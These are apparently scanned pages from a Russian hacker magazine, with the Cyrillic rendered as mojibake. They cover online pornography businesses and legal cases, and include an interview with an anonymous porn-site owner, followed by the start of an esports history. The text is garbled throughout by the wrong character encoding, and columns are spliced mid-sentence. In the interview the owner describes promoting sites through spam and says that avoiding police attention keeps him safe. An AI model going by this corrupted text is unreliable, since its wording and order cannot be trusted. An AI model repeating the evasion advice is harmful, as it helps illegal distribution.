ÍÅÑÊÎËÜÊÎ ÈÑÒÎÐÈÉ ÏÎÐÍÎÈÍÄÓÑÒÐÈÈ Â ÿíâàðå 2004 ãîäà â Ñåòè ïîÿâèëñÿ ñàéò booble.com. Áóáëü — ýòî ïîèñêîâèê, ïðåäíàçíà÷åííûé äëÿ ïîèñêà ïîðíî â Èíòåðíåòå, êîïèðóþùèé íå òîëüêî íàçâàíèå Google, íî è åãî äèçàéí. Ðóêîâîäñòâî google.com âîçìóòèëîñü è ïîòðåáîâàëî íåìåäëåííîãî ïðåêðàùåíèÿ ñòîëü âîïèþùåãî íàðóøåíèÿ àâòîðñêèõ ïðàâ. Ñîçäàòåëè booble æå óòâåðæäàþò, ÷òî èõ äåòèùå — âñåãî ëèøü íåâèííàÿ ïàðîäèÿ, êðîìå òîãî, «ó ëþáîãî íîðìàëüíîãî ÷åëîâåêà, èñêëþ÷àÿ àäâîêàòîâ, ñàéò Booble âûçûâàåò óëûáêó». Íåñìîòðÿ íà âñå ñòàðàíèÿ ðåáÿò èç Google, ïîðíîïàðîäèÿ äî ñèõ ïîð ïðåêðàñíî ôóíêöèîíèðóåò, ñòàëà äîâîëüíî ïîïóëÿðíîé è çàêðûâàòüñÿ, ïîõîæå, íå ñîáèðàåòñÿ. Âîîáùå, ïîðíî â Ñåòè íå òîëüêî ïîïóëÿðíî, íî äàæå óâàæàåìî.

íî». Ãýðè íå ñäàâàëñÿ, è ÷åðåç íåêîòîðîå âðåìÿ äîáèëñÿ îò ñóäà î÷åíü óäà÷íîãî äëÿ ñåáÿ ïðèãîâîðà: Ñòèâåíà Êîýíà îáÿçàëè âûïëàòèòü ïîòåðïåâøåé ñòîðîíå 65 ìèëëèîíîâ äîëëàðîâ êîìïåíñàöèè. Íî äåíåã êèáåðñêâîòòåðó ñòàëî æàëêî, è îí óäàðèëñÿ â áåãà. Ñïóñòÿ ïÿòü ëåò îí âåðíóëñÿ è äàæå ïîäàë àïåëëÿöèþ — ìîë, ÿ ýòè 65 ìèëëèîíîâ çà âñþ æèçíü íå çàðàáîòàþ. ×òî íå ñîâñåì ïðàâäà, òàê êàê ñàéò sex.com ýêñïåðòû îöåíèëè â 250 ìèëëèîíîâ óáèòûõ åíîòîâ, à Ñòèâåí Êîýí çà ïÿòü ëåò ýêñïëóàòàöèè ïîðòàëà çàðàáîòàë êóäà áîëüøå. Êàê áû òàì íè áûëî, ñâîèõ áàáîê Êðèìåí íå óâèäèò åùå äîëãî, åñëè âîîáùå óâèäèò. À âñå ïîëüçîâàòåëè Ñåòè ïîëó÷èëè åùå îäèí ïðèìåð òîãî, êàê ñäåëàòü ñóìàñøåäøèå äåíüãè íà êèáåðñêâîòòèíãå. Ñåòåâàÿ ïîðíîèíäóñòðèÿ âîëíóåò íå òîëüêî áîðöîâ çà íðàâñòâåííîñòü, íî è äðóãèõ áèçíåñìåíîâ â ýòîé îáëàñòè. Íàïðèìåð, òèðàæ æóðíàëà PentHouse â ïîñëåäíèå ãîäû óïàë ñ 4,7 ìèëëèîíîâ äî 650 òûñÿ�� ýêçåìïëÿðîâ â ìåñÿö. Áîá Ãó÷÷èîíå, âëàäåëåö æóðíàëà, ñ÷èòàåò, ÷òî â ýòîì âèíîâàò Èíòåðíåò. Áûâøèì ÷èòàòåëÿì òåïåðü ëåã÷å âûéòè â Ñåòü è íàéòè ëþáóþ ïîðíóøêó, ÷åì ïîêóïàòü PentHouse. ×òî äåëàòü — êîíêóðåíöèÿ…

ÑÊÀÍÅÐ «ÀÍÒÈÏÎÐÍλ ÍÀ ÂÛÑÒÀÂÊÅ INFOSECURITY 2005, ÏÎÌÈÌÎ ÔÀÉÐÂÎËÎÂ, ÀÍÒÈÂÈÐÓÑÎÂ È ÏÐÎ×ÅÃÎ ÀÍÒÈÕÀÊÅÐÑÊÎÃÎ ÑÎÔÒÀ, ÁÛË ÏÐÅÄÑÒÀÂËÅÍ «ÏÎÐÍÎÑÊÀÍÅл. ÏÐÎÃÐÀÌÌÀ FIRST 4 INTERNET ÏÐÎÂÎÄÈÒ «ÈÍÒÅËËÅÊÒÓÀËÜÍÛÉ ÀÍÀËÈÇ ÈÇÎÁÐÀÆÅÍÈß», ÎÏÐÅÄÅËßß, ßÂËßÅÒÑß ËÈ ÄÀÍÍÀß ÊÀÐÒÈÍÊÀ ÏÎÐÍÎÃÐÀÔÈ×ÅÑÊÎÉ. ÐÀÇÐÀÁÎÒÊÈ Â ÝÒÎÉ ÎÁËÀÑÒÈ ÂÅÄÓÒÑß ÓÆÅ ÄÀÂÍÎ, ÍÎ ÏÎÊÀ FIRST 4 ßÂËßÅÒÑß ÅÄÈÍÑÒÂÅÍÍÎÉ ÏÎ-ÍÀÑÒÎßÙÅÌÓ ÐÀÁÎ×ÅÉ ÏÐÎÃÐÀÌÌÎÉ ÏÎÄÎÁÍÎÃÎ ÐÎÄÀ. ÓÒÈËÈÒÀ ÍÀÂÅÐÍßÊÀ ÁÓÄÅÒ ÂÎÑÒÐÅÁÎÂÀÍÀ ÐÎÄÈÒÅËßÌÈ È ØÅÔÀÌÈ ÊÐÓÏÍÛÕ ÔÈÐÌ, ÍÅÄÎÂÎËÜÍÛÕ ÈÑÏÎËÜÇÎÂÀÍÈÅÌ ÈÍÒÅÐÍÅÒÀ ÑÂÎÈÌÈ ÑÎÒÐÓÄÍÈÊÀÌÈ ÍÅ ÏÎ ÍÀÇÍÀ×ÅÍÈÞ.

092

XÀÊÅÐ 01 /85/ 06


ÑÀÌÛÉ ÏÐÈÁÛËÜÍÛÉ ÁÈÇÍÅÑ — ÝÒÎ ÎÐÃÀÍÈÇÀÖÈß ÈÍÒÅÐÀÊÒÈÂÍÛÕ ÒÐÀÍÑËßÖÈÉ? ÄÀ. ÄÎÕÎÄ ÎÒ 18 ØÒÓÊ ÁÀÊÑΠ ÌÅÑßÖ. ÍÅ ÂÑÅ ÊÎÒÓ ÌÀÑËÅÍÈÖÀ Íî íå âñå òàê áåçîáëà÷íî â ìèðå äæåïåãîâûõ òåòîê, âçðîñëûõ ñàéòîâ è áîëüøèõ äåíåã. Êîìïàíèÿ AOL íåäàâíî ïðåäúÿâèëà èñê âëàäåëüöàì ñåòåâîé ôèðìû, ïðîâîäèâøèì ïî àñüêå ñïàì-ðàññûëêó, ðåêëàìèðóþùóþ ïîðíîñàéòû. Äëÿ áèçíåñìåíîâ ýòà èñòîðèÿ çàêîí÷èëàñü áîëüøèì øòðàôîì è çàâåðøåíèåì êàðüåðû â ïîðíîèíäóñòðèè. Ïåðâûé â èñòîðèè Ðîññèè àðåñò çà ðàñïðîñòðàíåíèå ïîðíîãðàôèè áûë ñîâåðøåí â 2000 ãîäó â Óëüÿíîâñêå. Ïîðíîãðàôîì îêàçàëñÿ îáû÷íûé ñòóäåíò Óëüÿíîâñêîãî Ãîñóäàðñòâåííîãî Óíèâåðñèòåòà, íà êîòîðîãî âûøëè áëàãîäàðÿ ïðîâàéäåðàì, îáíàðóæèâøèì ñàéò â Ñåòè. Ñòóäåíòó ãðîçèëî äî äâóõ ëåò ëèøåíèÿ ñâîáîäû, íî åãî àìíèñòèðîâàëè. Íàïîìíþ òåáå, ÷òî çà íåçàêîííîå ðàñïðîñòðàíåíèå ïîðíîãðàôè÷åñêèõ ìàòåðèàëîâ, ñîãëàñíî ñòàòüå 242, ïðåäóñìîòðåí øòðàô â ðàçìåðå îò äâóõñîò äî ïÿòèñîò ìèíèìàëüíûõ ðàçìåðîâ îïëàòû òðóäà ëèáî ëèøåíèå ñâîáîäû ñðîêîì äî äâóõ ëåò. Âïðî÷åì, ïîðíîñàéòîñòðîèòåëüñòâîì çàíèìàþòñÿ íå òîëüêî ðóññêèå ñòóäåíòû.  Òàéâàíå 13-ëåòíèé ìàëü÷èê áûë àðåñòîâàí çà ñîçäàíèå è ïîääåðæêó ïîðòàëà, ïðåäëàãàþùåãî ïðèîáðåòåíèå ðàçëè÷íûõ ñåêñóàëüíûõ óñëóã. Ïàðåíåê óâåðÿë, ÷òî ñàéò ñîçäàë äëÿ ïðèêîëà, è íå ñîáèðàëñÿ ñîâåðøàòü íè÷åãî êðèìèíàëüíîãî, íî äîáëåñòíûå îðãàíû íå ïðîíèêëèñü: ðîäèòåëè áûëè âûíóæäåíû çàïëàòèòü 30 000 äîëëàðîâ ÑØÀ (î òîì, ÷òî ñäåëàë ïàïà ñ ñûíî÷êîì, îïóñòèâøèì åãî íà 30 êóñêîâ, èñòîðèÿ óìàë÷èâàåò). Íî ýòî âñå öâåòî÷êè.  ÑØÀ áûë àðåñòîâàí âëàäåëåö ïîðíîñàéòà, êîòîðûé ïðåäîñòàâëÿë äîñòóï ê ñîäåðæèìîìó âîåííîñëóæàùèì â Èðà-

ÐÀÇÃÎÂÎÐ ÏÎ ÄÓØÀÌ Íàéòè ÷åëîâåêà äëÿ èíòåðâüþ ê ýòîé ñòàòüå áûëî äîâîëüíî ñëîæíî. Áèçíåñ íåëåãàëüíûé, è ñâåòèòüñÿ â ïîïóëÿðíûõ æóðíàëàõ ëèöàì èç ïîðíîèíäóñòðèè íå õî÷åòñÿ. Òåì íå ìåíåå, ïîòóñîâàâøèñü â øèðîêî èçâåñòíûõ óçêîìó êðóãó ñåòåâûõ ìåñòàõ, ÿ íàøåë òîãî, êîãî èñêàë. Ìîé ñîáåñåäíèê ñîãëàñèëñÿ îòâåòèòü íà âîïðîñû ïðè óñëîâèè ñîõðàíåíèÿ åãî àíîíèìíîñòè. Èëüÿ Àëåêñàíäðîâ : Ïðèâåò. Êàê òåáÿ ïðåäñòàâèòü ÷èòàòåëÿì? Ïàðà ôðàç î ñåáå. Àíòîí: Êàê ïðåäñòàâèòü? Õì.. Àíòîí, ïóñòü áóäåò Àíòîí. Î ñåáå ìîãó ñêàçàòü, ÷òî æèâó â Ïèòåðå, ìíå 20 ñ íåáîëüøèì ëåò, æåíàò. Íà æèçíü, êàê òû óæå çíàåøü, çàðàáàòûâàþ ïóòåì ñîçäàíèÿ è ïîääåðæêè ïîðíîñàéòîâ â Èíòåðíåòå. È.À.: Êàê äàâíî òû â ýòîì áèçíåñå? Êàê ïðèøëà â ãîëîâó ìûñëü çàíÿòüñÿ ýòèì? À.: Ïîðÿäêà ÷åòûðåõ ëåò.  óíèâåðå ÿ ïîäðàáàòûâàë ñîçäàíèåì web-ñàéòîâ è îäíàæäû ïîëó÷èë çàêàç íà ðàçðàáîòêó ñàéòà Adult-íàïðàâëåííîñòè. Çàêàç÷èê õîòåë, ÷òîáû ÿ âçÿë íà ñåáÿ è îðãàíèçàöèþ áèëëèíãà, è ïîêóïêó õîñòèíãà. Òàê ÿ ïîëó÷èë ïîëíîå ïðåäñòàâëåíèå î òîì, ÷òî íóæíî äëÿ çàíÿòèÿ ïîðíîáèçíåñîì. Ñëåäóþùèé ïîðíîñàéò ÿ äåëàë óæå äëÿ ñåáÿ. È.À.: Ñàìûé ïðèáûëüíûé áèçíåñ — ýòî îðãàíèçàöèÿ èíòåðàêòèâíûõ òðàíñëÿöèé? À.: Äà. Äîõîä îò 18 øòóê áàêñîâ â ìåñÿö. Ïðàâäà, ÿ ýòèì íèêîãäà íå çàíèìàëñÿ. Ãîðàçäî áîëüøå ïðîáëåì òðåáóåò íåôèãîâûõ íà÷àëüíûõ âëîæåíèé. Êðîìå òîãî, íà ïîðÿäîê âûøå ðèñê. Òàê ÷òî ÿ óæ ëó÷øå äðîíàì èçîáðàæåíèÿ ãîëûõ áàá è âèäåîðîëèêè âïàðèâàòü áóäó. È.À.: Òû âëàäååøü íåñêîëüêèìè ïîðíîñàéòàìè? À.: Îêîëî ñîðîêà ðàçëè÷íîãî ñîäåðæàíèÿ. Ìîæíî ñêàçàòü, ñâîåãî ðîäà ñåòü. Ñ îäíîãî EV

INTERWI

êå â îáìåí íà ôîòîãðàôèè ñ áîåâûõ ïîëåé. Èõ îí ïóáëèêîâàë íà ñàéòå â ñâîáîäíîì äîñòóïå. Ïðè÷åì ñíèìêè ÿâíî íå îòëè÷àëèñü ïîëèòêîððåêòíîñòüþ. Íàïðèìåð, ïîä ôîòîãðàôèåé òðóïà ñ âûâîðî÷åííûìè âíóòðåííîñòÿìè è ìîçãàìè êðàñîâàëàñü íàäïèñü: «Òàê äîëæåí âûãëÿäåòü êàæäûé èðàêåö». È òàêèõ ñíèìêîâ â ãàëåðåå ìíîãî. 27-ëåòíèé âëàäåëåö ñàéòà Êðèñ Óèëñîí ñåé÷àñ íàõîäèòñÿ ïîä ñëåäñòâèåì â òþðüìå, à â ñâîå îïðàâäàíèå çàÿâèë: «Ñíèìêè — ýòî ïðîñòî íîâûé âçãëÿä íà âîéíó. Ñ èõ, ñîëäàò, òî÷êè çðåíèÿ». Ðàíüøå íà ñàéòå íå áûëî íè÷åãî, êðîìå ïîðíîêîíòåíòà, è, êîãäà æàëîáû àìåðèêàíñêèõ ñîëäàò â Èðàêå î ñëèøêîì áîëüøîé ñòîèìîñòè àêêàóíòà ó÷àñòèëèñü, Óèëñîí ñîãëàñèëñÿ ïðåäîñòàâèòü èì õàëÿâíûé äîñòóï â îáìåí íà ñêàíäàëüíûå ôîòîãðàôèè. Ñêîðåå âñåãî, Óèëñîí âûéäåò íà âîëþ â áëèæàéøåì áóäóùåì. Óãîëîâíîãî ïðåñòóïëåíèÿ â ïóáëèêàöèè ôîòîãðàôèé íåò, õîòÿ Êðèñà ìîãóò îñóäèòü çà ðàñïðîñòðàíåíèå ïîðåâà. Ïîâåçëî Óèëñîíó, ÷òî æèâåò îí â Àìåðèêå, à íå â Êèòàå. Âîò óæ ãäå íå ëþáÿò ïîðíóøêó è ïîðíîäèëåðîâ!  êà÷åñòâå ïðèìåðà ìîæíî ïðèâåñòè êèòàéñêîãî òîâàðèùà ×åíà, êîòîðûé çàðàáàòûâàë íà æèçíü ðàñïðîñòðàíåíèåì ëàçåðíûõ äèñêîâ ñ ïîðíîãðàôèåé.  ÊÍÐ çà ìîðàëüíóþ ÷èñòîòó æèòåëåé ïîäíåáåñíîé áîðþòñÿ ñî âñåé æåñòîêîñòüþ, ïîýòîìó ×åí ïîëó÷èë 19 ëåò ëèøåíèÿ ñâîáîäû. Ãîâîðÿò, ïàðíþ êðóïíî ïîâåçëî, òàê êàê ìîãëè âåäü è ê ñòåíêå ïîñòàâèòü. Òåïåðü êèòàéñêèì âëàäåëüöàì ïîðíîñàéòîâ, ÷üÿ ïîñåùàåìîñòü áîëåå 250 000 ÷åëîâåê â äåíü, ãðîçèò ïîæèçíåííîå çàêëþ÷åíèå. Ïðè÷åì îðãàíû îòíþäü íå áåçäåéñòâóþò: çà ïîñëåäíåå âðåìÿ çàêðûòî áîëåå ñåìèñòà ïîðòàëîâ è àðåñòîâàíî îêîëî 244 ÷åëîâåê.

åäèíñòâåííîãî ñàéòà ìíîãî äåíåã íå áóäåò. È.À.:  êàêèõ äîìåííûõ çîíàõ ÷àùå âñåãî ðàçìåùàþò ïîäîáíûå ñàéòû? Ãäå ïîêóïàåøü õîñòèíã? À.: Âåçäå, êðîìå .ru, ëó÷øèé âàðèàíò, êîíå÷íî — .com. Õîñòèíã îáû÷íî áåðóò ó êîíòîð, êîòîðûå ñïåöèàëèçèðóþòñÿ èìåííî íà ýäàëòå. Íàïðèìåð, adulthost.ru — îíëàéíîâîå ïðåäñòàâèòåëüñòâî ôèðìû èç ÑØÀ. È.À.: Íå áîèøüñÿ îðãàíîâ? À.: Íåò. Åñëè íå ñâåòèòüñÿ, ñîáëþäàòü îñòîðîæíîñòü, òî âåðîÿòíîñòü òîãî, ÷òî òåáÿ ïîâÿæóò, ôàêòè÷åñêè ðàâíà íóëþ. Êðîìå òîãî, êàê òû äîêàæåøü, ÷òî íà ìîèõ ïîðòàëàõ âûëîæåíà ïîðíîãðàôèÿ, à íå ýðîòèêà? À ýðîòèêà — èñêóññòâî, çà íåå â òþðüìó íå ñàæàþò. È.À.: Ñêîëüêî âðåìåíè îòíèìàåò ó òåáÿ òâîé áèçíåñ? À.: ×àñà ïî 3—4 â äåíü. Ñþäà âõîäèò è îáíîâëåíèå ãàëåðåé ñ èçîáðàæåíèåì, è èçó÷åíèå êîíêóðèðóþùèõ ñàéòîâ, è âñå îñòàëüíîå. Õîòÿ êîãäà òîëüêî íà÷èíàë äåëî, ó ìåíÿ íå áûëî íè ìèíóòû ñâîáîäíîãî âðåìåíè. È.À.: Êàê íàñ÷åò ìîðàëüíîé ñòîðîíû âîïðîñà? À.: Íå ñòûäíî ëè ìíå, ÷òî ÿ ðàñòëåâàþ ëþäåé ïîðíîãðàôèåé? Íåò, íå ñòûäíî. Ïîñåùàòü èëè íå ïîñåùàòü ïîðíîñàéòû — ëè÷íîå äåëî êàæäîãî. Åñëè íàðîä õî÷åò âèäåòü ïîðíîãðàôèþ, åå åìó äàäóò. À åñëè ÿ ìîãó ñäåëàòü íà ýòîì äåíüãè, òî ïî÷åìó äîëæåí îñòàâàòüñÿ â ñòîðîíå? È.À.: ×òî ÿâëÿåòñÿ çàëîãîì ïîïóëÿðíîñòè ñàéòîâ? À.: Âî-ïåðâûõ, õîðîøàÿ ðàñêðóòêà. Âî-âòîðûõ, îðèãèíàëüíîñòü êîíòåíòà.  Ñåòè ìèëëèîíû ïîðíîñàéòîâ ñ îäèíàêîâûì ñîäåðæàíèåì, äàøü ëþäÿì ýêñêëþçèâ — ó òåáÿ áóäåò áîëüøàÿ ôîðà ïåðåä êîíêóðåíòàìè. È.À.: Òû ãîâîðèë ïðî ðàñêðóòêó. Ìîæíî ïîäðîáíåé?

À.:  öåëîì ðàñêðóòêà òà æå, ÷òî è ó îáû÷íûõ ïîðòàëîâ. Áàííåðíûå ñåòè, ðåãèñòðàöèÿ â ïîèñêîâèêàõ. Ïëþñ äîñòèæåíèå èëè ïîêóïêà, ïåðâûõ ìåñò â ðàçëè÷íûõ ïîðíîòîïàõ, ñïàì-ðàññûëêàõ. Ïðèñóòñòâóåò è íàêðóòêà ïîñåùàåìîñòè, íî ÷àùå âñå äåëàåòñÿ îòíîñèòåëüíî ÷åñòíî. È.À.: Äåòñêîå ïîðíî íà òâîèõ ïîðòàëàõ ïðèñóòñòâóåò? À.: Íåò. Äåòèøåê, çâåðþøåê è ïðî÷åãî íå äåðæèì. Ðèñêîâàííî, à òàêæå ïîõàáíî è ãðóáî. Õîòÿ íà ýòîì çàðàáàòûâàþò áîëüøå, ÷åì íà ïîðíóøêå «òðàäèöèîííîãî» ñîäåðæàíèÿ. È.À.: Íå õîòåë áû ïîðàáîòàòü «ñïåöèàëèñòîì ïî ïðîäâèæåíèþ ïîðíîñàéòîâ»? À.: Ìíîãèå ñåé÷àñ äåéñòâèòåëüíî çàíèìàþòñÿ ðàñêðóòêîé ïîðíîðåñóðñîâ, ïðîäâèãàÿ íîâûõ ëþäåé â áèçíåñå, ïðè÷åì ñòîèò ýòî îòíþäü íå äåøåâî. Íî ó ìåíÿ è òàê õâàòàåò êîíêóðåíòîâ, ÷òîáû ñîçäàâàòü èõ ñîáñòâåííûìè ðóêàìè. :) È.À.: ×òî êàñàåòñÿ «íîâûõ ëþäåé â áèçíåñå», èì ñåé÷àñ ÷òî-íèáóäü ñâåòèò? À.: Êîíå÷íî, ìåñòà ïîä ñîëíöåì äàâíî çàáèòû. È ÷òîáû ñåé÷àñ ñðóáèòü áàáëà íà ïîðíîèíäóñòðèè, íàäî î÷åíü ïîñòàðàòüñÿ. Íî ýòî âïîëíå ðåàëüíî, õîòÿ è íóæíî áûòü ãîòîâûì ê áîëüøèì ôèíàíñîâûì çàòðàòàì è òÿæåëîìó òðóäó. È.À.: Ñïàñèáî, Àíòîí. Óäà÷è òåáå â òâîåì íåëåãêîì äåëå! Ç.Û. Îòâåäåííîå ìíå ìåñòî çàêàí÷èâàåòñÿ, íàäåþñü, òû íå ïîæàëåë âðåìåíè, çàòðà÷åííîãî íà ÷òåíèå ñòàòüè. Ïîðíîãðàôèÿ, êàê áû òàì íè áûëî, íàäîëãî âîøëà â íàøó æèçíü. ß íå âèæó â ýòîì íè÷åãî õîðîøåãî, êàê, âïðî÷åì, è ïëîõîãî. Íî îäíî çíàþ òî÷íî: ðåàëüíûå äåâóøêè âîçáóæäàþò ìåíÿ êóäà áîëüøå âèðòóàëüíûõ. BINARY YOUR’S z

XÀÊÅÐ 01 /85/ 06

093


ÑÖÅÍÀ

ÊÈÁÅÐÑÏÎÐÒ — ÑÏÎÐÒ ÁÓÄÓÙÅÃÎ! — ÌÍÎÃÎÎÁÅÙÀÞÙÅ ÃËÀÑÈËÈ “ ÏÐÅÑÑ-ÐÅËÈÇÛ ÒÓÐÍÈÐΠÏÎ ÊÎÌÏÜÞÒÅÐÍÛÌ ÈÃÐÀÌ ÍÅÑÊÎËÜÊÎ ËÅÒ ÒÎÌÓ ÍÀÇÀÄ. ÑÅÃÎÄÍß ÏÎÄÎÁÍÛÅ ÌÅÐÎÏÐÈßÒÈß ÓÆÅ ÍÅ ÐÅÄÊÎÑÒÜ, È ÑÀÌÈ ÊÈÁÅÐÑÏÎÐÒÑÌÅÍÛ ÌÎÃÓÒ Ñ ÓÂÅÐÅÍÍÎÑÒÜÞ ÑÊÀÇÀÒÜ: ÊÈÁÅÐÑÏÎÐÒ — ÑÏÎÐÒ ÍÀÑÒÎßÙÅÃÎ ÂÐÅÌÅÍÈ. ÂÑÅ ÁÎËÜØÅ ÌÎËÎÄÛÕ ËÞÄÅÉ ÎÒÄÀÞÒ ÏÐÅÄÏÎ×ÒÅÍÈÅ ÈÌÅÍÍÎ ÅÌÓ, À ÍÅ ÒÐÀÄÈÖÈÎÍÍÎÌÓ ÑÏÎÐÒÓ, È ÎÍ ÏÐÎÄÎËÆÀÅÒ ÐÀÇÂÈÂÀÒÜÑß ÁÛÑÒÐÛÌÈ ÒÅÌÏÀÌÈ, ÏÐÈ ÝÒÎÌ ÂÑÅ ÅÙÅ ÍÀÕÎÄÈÒÑß Â ÑÒÀÄÈÈ ÇÀÐÎÆÄÅÍÈß. ÏÎÒÅÍÖÈÀË Ê ÐÀÇÂÈÒÈÞ ÎÃÐÎÌÅÍ, À ÏÐÈÄÀÍÈÅ ÒÅÐÌÈÍÓ «ÊÎÌÏÜÞÒÅÐÍÛÉ

ÑÏÎÐÒ» ÎÔÈÖÈÀËÜÍÎÃÎ ÑÒÀÒÓÑÀ — ËÈØÜ ÂÎÏÐÎÑ ÂÐÅÌÅÍÈ

094

XÀÊÅÐ 01 /85/ 06


TEXT OVERMIND / evil-2002@yandex.ru /

ÑÏÎÐÒ XXI ÂÅÊÀ / ÕÐÎÍÈÊÈ ÊÈÁÅÐÑÏÎÐÒÀ

XÀÊÅÐ 01 /85/ 06

095


ÑÖÅÍÀ ///// ISSUE

CYBERSPORT TIMELINE / 1990-2 2006 /

Íàèáîëåå ÿðêèå êèáåðñïîðòèâíûå FPS íà÷àëà 90-õ: Wolfenstein 3D Doom Doom II Heretic Hexen Íàèáîëåå ÿðêèå êèáåðñïîðòèâíûå RTS íà÷àëà 90-õ: WarCraft ÝÊÑÊÓÐÑ Â ÈÑÒÎÐÈÞ Íèêòî òî÷íî íå âîçüìåòñÿ ñêàçàòü, êîãäà è îòêóäà âïåðâûå ïîÿâèëîñü ïîíÿòèå «êèáåðñïîðò».  êîíöå 80-õ — íà÷àëå 90-õ ãîäîâ ñòàëè âïåðâûå ïîÿâëÿòüñÿ êîìïüþòåðíûå èãðû, ðîäîíà÷àëüíèöû îñíîâíûõ êèáåðñïîðòèâíûõ æàíðîâ: FPS (øóòåðû îò ïåðâîãî ëèöà) è RTS (ñòðàòåãèè â ðåàëüíîì âðåìåíè). Îòáðîñèâ íåñêîëüêî ïðåäûäóùèõ è íå ñòîëü ïîïóëÿðíûõ èãð, ìîæíî íàçâàòü äâå, îò êîòîðûõ ó áûâàëûõ ãåéìåðîâ âîçíèêíåò ÷óâñòâî ãëóáîêîé íîñòàëüãèè. Ýòî òðåõìåðíàÿ ñòðåëÿëêà íà òåìó óíè÷òîæåíèÿ ôàøèñòîâ — Wolfenstein 3D è ñòðàòåãè÷åñêàÿ èãðà Dune II ïî ìîòèâàì îäíîèìåííîãî ïðîèçâåäåíèÿ Ôðýíêà Ãåðáåðòà. Îáå ýòè èãðû, âûøåäøèå â 1992 ãîäó, â òî âðåìÿ áûëè áåçóìíî ïîïóëÿðíû, íî åùå íå äàâàëè âîçìîæíîñòè èãðîêàì ñðàæàòüñÿ íåïîñðåäñòâåííî äðóã ñ äðóãîì.  1993 ãîäó id Software âûïóñòèëà Doom — òðåõìåðíûé øóòåð, ìîìåíòàëüíî ñòàâøèé õèòîì. Ó íåãî áûë óëó÷øåííûé, ïî ñðàâíåíèþ ñ ïðåäøåñòâåííèêàìè, ãðàôè÷åñêèé äâèæîê, íî ãëàâíîå — ïîääåðæèâàëàñü èãðà ïî ñåòè (ìàêñèìóì äî ÷åòûðåõ êîìïüþòåðîâ, ñâÿçàííûõ ÷åðåç ëîêàëüíóþ ñåòü èëè ìîäåì) êàê â êîìàíäå, òàê è äðóã ïðîòèâ äðóãà. Èãðîêè ïîëó÷èëè âîçìîæíîñòü ñîðåâíîâàòüñÿ â ñâîåì ìàñòåðñòâå, âûÿñíÿÿ, êòî áûñòðåå, ëó÷øå, òàêòè÷íåå. Èìåííî ñ ýòîãî ìîìåíòà ïðèíÿòî âåñòè îòñ÷åò ýðû êîìïüþòåðíîãî ñïîðòà. Àíàëîãè÷íûì ïðèìåðîì, òîëüêî äëÿ æàíðà RTS, ñòàëà ñòðàòåãè÷åñêàÿ èãðà WarCraft: Orcs & Humans, ñîçäàííàÿ Blizzard Entertainment â 1993 ãîäó, ÷åðåç äâà ãîäà ïîñëå îñíîâàíèÿ êîìïàíèè. Ýòà RTS-èãðà áûëà äâóõìåðíîé, íî âíåñëà ðÿä íîâîââåäåíèé â èãðîâîé ïðîöåññ: ñáîð ðåñóðñîâ, ñòðîèòåëüñòâî áàç è þíèòîâ, äåëåíèå íà ðàñû, êàæäàÿ èç êîòîðûõ îáëàäàëà óíèêàëüíûìè þíèòàìè è çäàíèÿìè, à òàêæå ïîýòàïíîå ðàçâèòèå ñòðîèòåëüñòâà è âåòêè òåõíîëîãèé. Ê 1995 ãîäó â ÑØÀ íà÷àëè ïðîâîäèòüñÿ áîëåå-ìåíåå ñåðüåçíûå òóðíèðû ïî êîìïüþòåðíûì èãðàì, ïðèâëåêàâøèå êàê èãðîêîâ,

096

Íàèáîëåå ÿðêèå êèáåðñïîðòèâíûå FPS ñåðåäèíû 90-õ: Duke Nukem 3D Quake Quake World Íàèáîëåå ÿðêèå êèáåðñïîðòèâíûå RTS ñåðåäèíû 90-õ: WarCraft II

òàê è áîëüøîå êîëè÷åñòâî çðèòåëåé. Òå ïîâëåêëè ïåðâûõ ñïîíñîðîâ, áëàãîäàðÿ êîòîðûì ñôîðìèðîâàëèñü ïîêà åùå ìèçåðíûå ïðèçîâûå ôîíäû.  1996 ãîäó îò òîãäàøíåãî çàêîíîäàòåëÿ æàíðà id Software âûøëà åùå îäíà êóëüòîâàÿ FPS-èãðà íà ïîëíîöåííîì òðåõìåðíîì äâèæêå — Quake (â êîíöå 1996 ãîäà ïîä íåå ïîëíîñòüþ áûë ïåðåïèñàí ñåòåâîé êîä, è èãðà ïðåâðàòèëàñü â Quake World).  àâãóñòå òîãî æå ãîäà, â Ãàðëàíäå (øòàò Òåõàñ), áûë ïðîâåäåí òóðíèð QuakeCon ïî èãðàì Doom II è Quake, ñîáðàâøèé îêîëî 60 ó÷àñòíèêîâ.  êà÷åñòâå ïðèçîâ âðó÷àëèñü ìàéêè è ôóòáîëêè ñ ëîãîòèïàìè òóðíèðà è èãð. Ñïóñòÿ íåñêîëüêî ìåñÿöåâ ïîÿâèëàñü ïåðâàÿ ñïîíñèðóåìàÿ êèáåðñïîðòèâíàÿ îíëàéíîâàÿ ëèãà PGL, ïðåäóñìàòðèâàâøàÿ ðåéòèíã ó÷àñòíèêîâ. Ïîâîðîòíûì â èñòîðèè êèáåðñïîðòà ñòàë 1997 ãîä, êîòîðûé îçíàìåíîâàëñÿ äàëüíåéøèì ðàçâèòèåì PGL, ïåðâûì êèáåðñïîðòèâíûì òóðíèðîì ñ êðóïíûì ïðèçîâûì ôîíäîì, ïðîâåäåíèåì âòîðîãî òóðíèðà ñåðèè QuakeCon, à òàêæå îñíîâàíèåì îðãàíèçàöèè CPL. PGL ïîëó÷èëà èíâåñòèöèè â ðàçìåðå äâóõ ìèëëèîíîâ äîëëàðîâ îò òàêèõ êîìïàíèé, êàê AMD, AT&T, Logitech, è US Robotics, è åùå ãîä íàëàæèâàëà ñèñòåìó ïðîôåññèîíàëüíîé êèáåðñïîðòèâíîé îíëàéí-ëèãè.  èþíå 1997 ãîäà ñîñòîÿëñÿ ÷åìïèîíàò Red Annihilation, áîëåå èçâåñòíûé êàê Ferrari Tourney. Ãëàâíûì è åäèíñòâåííûì åãî ïðèçîì áûë àâòîìîáèëü Ferrari 328 GTS 1987 ãîäà âûïóñêà, ñòîèìîñòüþ îêîëî $55,000, êîòîðûé áûë ïðåäîñòàâëåí îäíèì èç ñîçäàòåëåé Quake Äæîíîì Êàðìàêîì.  òå÷åíèå ñëåäóþùèõ ñåìè ëåò ýòîò ïðèç ñ÷èòàëñÿ ñàìûì áîëüøèì, êîãäà-ëèáî âûèãðàííûì îäíèì ÷åëîâåêîì â èñòîðèè êèáåðñïîðòà. Äîñòàëñÿ îí Äåííèñó «Thresh» Ôîíãó, ñòàâøåìó ëåãåíäàðíîé ëè÷íîñòüþ â êèáåðñïîðòå è îáûãðàâøåìó íà òîì òóðíèðå ïÿòíàäöàòü îïïîíåíòîâ. Èìåííî îí âïåðâûå ïîêàçàë íà ñåáå îáðàç 